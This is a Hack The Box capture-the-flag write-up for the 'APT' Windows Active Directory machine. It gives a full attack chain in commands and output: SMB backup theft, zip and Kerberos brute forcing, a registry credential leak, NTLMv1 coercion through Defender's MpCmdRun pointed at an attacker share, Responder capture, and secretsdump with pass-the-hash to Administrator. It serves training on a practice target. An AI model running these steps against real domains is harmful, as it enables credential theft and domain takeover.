Hackthebox APT WriteUp

Overview:

APT is AN insanely tough windows AD box, this box requires deep knowledge for a windows AD environments. First is to leak the ipv6 address on the server because namp only returned 2 ports which is 80 and 135 on the server, after gotten the ipv6 address there 445port for smb share that has a backup.zip. The backup.zip contains windows registry files that contains passwords and hashes. But for this instance, use creackmapexec will be blocked for cracking the hashes for a user, therefore, turned to use getTGT to get a ticket. Then use reg.py to find registries on the server, and it leaks user henry’s password. The PriEsc is to use responder to catch the NTLM hash from the box then pass and dump hashes by secretsdump.py then the Administrator’s hash will be there. There are lot of details to learn. So, with all that being said, Let’s just jump in.

Recon:

# Nmap 7.91 scan initiated Fri Apr  2 18:26:17 2021 as: nmap -sC -sV -p- -oN all -vvv 10.10.10.213
Nmap scan report for apt.htb (10.10.10.213)
Host is up, received echo-reply ttl 127 (0.11s latency).
Scanned at 2021-04-02 18:26:17 EDT for 349s
Not shown: 65533 filtered ports
Reason: 65533 no-responses
PORT    STATE SERVICE REASON          VERSION
80/tcp  open  http    syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Gigantic Hosting | Home
135/tcp open  msrpc   syn-ack ttl 127 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr  2 18:32:06 2021 -- 1 IP address (1 host up) scanned in 348.87 seconds

Head over to the webserver but found nothing useful. But it should be more than that.

The foothold:

Enumerate IPv6 address (Details are in the blog below )and use oxid resolver to find these address.

The OXID Resolver [Part 1] - Remote enumeration of network interfaces without any authentication …

Use OXIDResolver to leak the ipv6 address

mubix/IOXIDResolver

root@kali:/opt/IOXIDResolver# python IOXIDResolver.py -t 10.10.10.213
[*] Retrieving network interface of 10.10.10.213
Address: apt
Address: 10.10.10.213
Address: dead:beef::b885:d62a:d679:573f
Address: dead:beef::8f4:ffbc:b588:5bfe

Add the ipv6 address to /etc/hosts as “dead:beef::b885:d62a:d679:573f addr apt.htb apt.htb.local htb.local” and use namp to scan these ipv6 address.

nmap -vv --reason -6 -Pn -sU -A --top-ports=20 --version-all dead:beef::b885:d62a:d679:573f
nmap -vv --reason -6 -Pn -sV -sC --version-all dead:beef::8f4:ffbc:b588:5bfe

There is 445 samba server, So try to smbclient to connect to it.

root@kali:/opt/IOXIDResolver# smbclient -L \\\\apt.htb\\
WARNING: no network interfaces found
Enter WORKGROUP\root's password: 
Anonymous login successful
Sharename       Type      Comment
        ---------       ----      -------
        backup          Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
box.htb is an IPv6 address -- no workgroup available

There is a buckup.zip file, Let’s try to get it from the server.

root@kali:~/htb/boxes/apt# smbclient \\\\apt.htb\\backup
WARNING: no network interfaces found
Enter WORKGROUP\root's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Sep 24 03:30:52 2020
  ..                                  D        0  Thu Sep 24 03:30:52 2020
  backup.zip                          A 10650961  Thu Sep 24 03:30:32 2020
10357247 blocks of size 4096. 6966776 blocks available
smb: \> get backup.zip
getting file \backup.zip of size 10650961 as backup.zip (731.7 KiloBytes/sec) (average 731.7 KiloBytes/sec)

It needs password, So use fcrackzip with wordlist rockyou to crack the password.

root@kali:~/htb/boxes/apt# fcrackzip -D -p ~/rockyou.txt backup.zip
possible pw found: iloveyousomuch ()
root@kali:~/htb/boxes/apt# unzip backup.zip 
Archive:  backup.zip
   creating: Active Directory/
[backup.zip] Active Directory/ntds.dit password: 
  inflating: Active Directory/ntds.dit  
  inflating: Active Directory/ntds.jfm  
   creating: registry/
  inflating: registry/SECURITY       
  inflating: registry/SYSTEM

There are some juicy files but the most interesting files are ntds.nit abd SYSTEM, they are Windows registry files and password and hashes are stored in the Windows Registry.

There are bunch of users and hashes. Now clear up the top and bottom so that the file only has username and hashes. Then use awk function to print usernames and safe it to a file called user.txt.

cat passwordandhashes.txt | awk -F '\\:' '{print $1}' | uniq -u | sort > users.txt

root@kali:/opt/adtools# cat ~/htb/boxes/apt/users.txt | wc -l
2001

There are 2001 users ,So We can use kerbrute(grab it from below link) to brute force userlist to find valid user on the AD domain controller. And from previous nmap scan that the dc (Domain Component)for kerbrute is apt.htb.local d (Domain) is htb.local. Now Let’s fire up kerbrute.

Release v1.0.3 · ropnop/kerbrute

root@kali:~/htb/boxes/apt# ./kerbrute_linux_amd64 userenum --dc apt.htb.local -d htb.local users.txt
__             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 01/05/21 - Ronnie Flathers @ropnop
2021/01/05 13:24:29 >  Using KDC(s):
2021/01/05 13:24:29 >   apt.htb.local:88
2021/01/05 13:24:40 >  [+] VALID USERNAME:       Administrator@htb.local
2021/01/05 13:25:40 >  [+] VALID USERNAME:       APT$@htb.local
2021/01/05 13:31:36 >  [+] VALID USERNAME:       henry.vinson@htb.local
2021/01/05 13:41:19 >  Done! Tested 2001 usernames (3 valid) in 1009.042 seconds

Try to grep above account’s hashes and analysis.

root@kali:~/htb/boxes/apt# cat passwordandhashes.txt | grep 'henry.vinson\|Administrator\|APT'
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
APT$:1000:aad3b435b51404eeaad3b435b51404ee:b300272f1cdab4469660d55fe59415cb:::
henry.vinson:3647:aad3b435b51404eeaad3b435b51404ee:2de80758521541d19cabba480b260e8f:::
Administrator:aes256-cts-hmac-sha1-96:d35ae5b9bf5ee7f6c4480bb73b3d8235f022b4fd504c7a3e35b9101b4c40e1d4
Administrator:aes128-cts-hmac-sha1-96:26c50872286f2847fc85cf611871106d
Administrator:des-cbc-md5:c767fd15d55eabef
APT$:aes256-cts-hmac-sha1-96:d5063cca2e42ccf7be4fe802d6d231aebd279a19e45733cabc173d4235ed432b
APT$:aes128-cts-hmac-sha1-96:cca6a15aed61bc9d6e3add512f1f377b
APT$:des-cbc-md5:07d05b1a1a34d63d
henry.vinson:aes256-cts-hmac-sha1-96:4c0ec4cffc953266ed72d9b565da62115655d2f402416af92e4e76d121663e2f
henry.vinson:aes128-cts-hmac-sha1-96:da63c28166768a2829f00d30ec9fbddd
henry.vinson:des-cbc-md5:80a2c83213b3dfd6
root@kali:~/htb/boxes/apt# cat passwordandhashes.txt | grep -v aes | grep -v des | awk -F '\\:' '{print $3":"$4}' > hashes.txt

Use crackmapexec to find valid hash but it blocks you brute force authentication, So we had to find another way.

Another way is to get a kerberos ticket for it to connect to evil-winrm. Use a script for getTGT to brute force tickets and it wont block IP like crackmapexec.

And it talks sometime to run to process all the hashes. After a while I had henry.vinson ‘s hash. Now use reg.py dumping the registry files.

aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb

root@kali:~/htb/boxes/apt# reg.py -hashes aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\SOFTWARE\\GiganticHostingManagementSystem
Impacket v0.9.23.dev1+20201209.133255.ac307704 - Copyright 2020 SecureAuth Corporation
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\SOFTWARE\GiganticHostingManagementSystem
        UserName        REG_SZ   henry.vinson_adm
        PassWord        REG_SZ   G1#Ny5@2dvht

Found henry.vinson’s credentials.

PriEsc to Administrator:

root@kali:~/htb/boxes/schooled# evil-winrm -i (ipv6adresshere) -u 
henry.vinson\_adm -p 'G1#Ny5@2dvht'
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\henry.vinson_adm\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
[0;31m*Evil-WinRM*[0m[0;1;33m PS 

Poking around and there is a file in powershell history directory.

[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\henry.vinson_adm\Documents> type C:\Users\henry.vinson_adm\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
$Cred = get-credential administrator
invoke-command -credential $Cred -computername localhost -scriptblock {Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel -Type DWORD -Value 2 -Force}

That script is changing the security value of the LAN Manager on widnows.

Network security LAN Manager authentication level (Windows 10) - Windows security

This means that, at level 2,Client devices use NTLMv1 authentication, and they use NTLMv2 session security if the server supports it. Domain controllers accept LM, NTLM, and NTLMv2 authentication.

So, we can capture LM hashes on our client side, we just need to use responder, and have the target try and connect back to us. This is one time that Windows Defender is going to work for us.

cd "\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0"
.\MpCmdRun.exe -Scan -ScanType 3 -File \\ip\file.exe

Before run responder, we need to set change to a magic number, details are in below link. Then run responder to catch the hash.

Cracking NETLM/NETNTLMv1 Authentication

[SMB] NTLMv1 Client   : 10.10.10.213
[SMB] NTLMv1 Username : HTB\APT$
[SMB] NTLMv1 Hash     : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788

Hash format for crack.sh: NTHASH:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384

Submit to https://crack.sh/get-cracking/ and they will email back the result very soon.

Crack.sh  has successfully completed its attack against your NETNTLM handshake.  The NT hash for the handshake is included below, and can be plugged back  into the 'chapcrack' tool to decrypt a packet capture, or to  authenticate to the server:  Token:  $NETNTLM$1122334455667788$95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384 Key: d167c3238864b12f5f82feae86a7f798

Using the key to dump secrets, First set up a hash “aad3b435b51404eeaad3b435b51404ee” means no password, the last part was the hash we just cracked. So the whole hash would be

aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798

Now fire up secretsdump.py to pass and dump all hashes on the entire apt’s domains.

root@kali:~/htb/boxes/apt# secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798 'apt.htb/APT$@apt.htb.local'
Impacket v0.9.23.dev1+20201209.133255.ac307704 - Copyright 2020 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c370bddf384a691d811ff3495e8a72e2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:738f00ed06dc528fd7ebb7a010e50849:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
henry.vinson:1105:aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb:::
henry.vinson_adm:1106:aad3b435b51404eeaad3b435b51404ee:4cd0db9103ee1cf87834760a34856fef:::
APT$:1001:aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:72f9fc8f3cd23768be8d37876d459ef09ab591a729924898e5d9b3c14db057e3
Administrator:aes128-cts-hmac-sha1-96:a3b0c1332eee9a89a2aada1bf8fd9413
Administrator:des-cbc-md5:0816d9d052239b8a
krbtgt:aes256-cts-hmac-sha1-96:b63635342a6d3dce76fcbca203f92da46be6cdd99c67eb233d0aaaaaa40914bb
krbtgt:aes128-cts-hmac-sha1-96:7735d98abc187848119416e08936799b
krbtgt:des-cbc-md5:f8c26238c2d976bf
henry.vinson:aes256-cts-hmac-sha1-96:63b23a7fd3df2f0add1e62ef85ea4c6c8dc79bb8d6a430ab3a1ef6994d1a99e2
henry.vinson:aes128-cts-hmac-sha1-96:0a55e9f5b1f7f28aef9b7792124af9af
henry.vinson:des-cbc-md5:73b6f71cae264fad
henry.vinson_adm:aes256-cts-hmac-sha1-96:f2299c6484e5af8e8c81777eaece865d54a499a2446ba2792c1089407425c3f4
henry.vinson_adm:aes128-cts-hmac-sha1-96:3d70c66c8a8635bdf70edf2f6062165b
henry.vinson_adm:des-cbc-md5:5df8682c8c07a179
APT$:aes256-cts-hmac-sha1-96:4c318c89595e1e3f2c608f3df56a091ecedc220be7b263f7269c412325930454
APT$:aes128-cts-hmac-sha1-96:bf1c1795c63ab278384f2ee1169872d9
APT$:des-cbc-md5:76c45245f104a4bf
[*] Cleaning up...

use evil-winrm to login to Administrator’s account.

root@kali:~/htb/boxes/apt# evil-winrm -i apt.htb -u administrator -H c370bddf384a691d811ff3495e8a72e2
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
[0;31m*Evil-WinRM*[0m[0;1;33m PS[0mC:\Users\Administrator\Documents> whoami
htb\administrator